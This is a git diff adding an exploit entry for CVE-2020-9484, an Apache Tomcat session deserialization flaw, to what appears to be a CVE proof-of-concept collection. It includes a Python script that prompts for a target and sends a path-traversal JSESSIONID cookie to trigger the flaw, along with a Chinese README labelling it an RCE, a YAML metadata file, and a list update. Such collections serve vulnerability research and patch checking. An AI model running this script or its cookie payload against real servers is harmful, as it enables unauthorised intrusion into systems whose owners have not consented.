diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
new file mode 100644
index 0000000000000000000000000000000000000000..084b803fc5b02a4ed7288e5bc5987c12935bc10b
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
@@ -0,0 +1,37 @@
+import requests
+import os, sys
+
+
+
+def main():
+    print("CVE: CVE-2020-9484")
+    RHOST = input("Target : ")
+    try:
+        u = requests.get(f"{RHOST}/index.jsp")
+        if u.status_code == 200:
+            print("Found Index Page")
+            pass
+        elif u.status_code == 404:
+            print("Looks Like we Could not Find index Page")
+            sys.exit()
+        header = {
+            "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+        }
+        sett = requests.get(f"{RHOST}/index.jsp", headers=header)
+        if sett.status_code == 200:
+            print(sett.text)
+            #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null")
+            #print("If Any Results They Will be Saved in result.txt")
+            print("Output ^")
+        if sett.status_code == 500:
+            print("Patched")
+            sys.exit()
+            
+        if sett.text == " ":
+            print("No Content")
+            pass
+        
+    except Exception as e:
+        print("Looks Like there Was A Problem Connecting to Target")
+        
+main()
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..1f18c3ce24974380f0e7646c8dd6dbbd8106a797
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
@@ -0,0 +1,13 @@
+# Tomcat-RCE
+Apache Tomcat RCE
+#Use
+Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求，造成反序列化代码执行漏洞。
+[-]   Apache Tomcat RCE漏洞 (CVE-2020-9484)
+
+
+# eg
+
+python3 CVE-2020-9484.py
+
+# reference
+code from: https://github.com/RepublicR0K/CVE-2020-9484
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e4cf2843d01133e28021b85a4daea0884c53fdda
--- /dev/null
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-9484
+source: https://github.com/RepublicR0K/CVE-2020-9484
+info:
+  name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时，使用不安全的配置（没有使用EncryptInterceptor）会存在反序列化漏洞，攻击者通过精心构造的数据包， 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+  severity: high
+  description:
+    当Tomcat使用了自带session同步功能时，使用不安全的配置（没有使用EncryptInterceptor）会存在反序列化漏洞，攻击者通过精心构造的数据包， 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+  scope-of-influence:
+    Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103
+  reference:
+    - https://seclists.org/oss-sec/2020/q2/136
+    - https://www.seebug.org/vuldb/ssvid-98234
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.0
+    cve-id: CVE-2020-9484
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
+  tags: cve2020, Apache, Tomcat, RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b35d0b64427106bfae1b10501e49d72e415179a1..eb286f76b593eeed2f460bf403a851ef361617b9 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -10,6 +10,7 @@ cve:
     - CVE-2021-27905
   apache-tomcat:
     - CVE-2022-29885
+    - CVE-2020-9484
   apache-Spark:
     - CVE-2022-33891
   linux-kernel: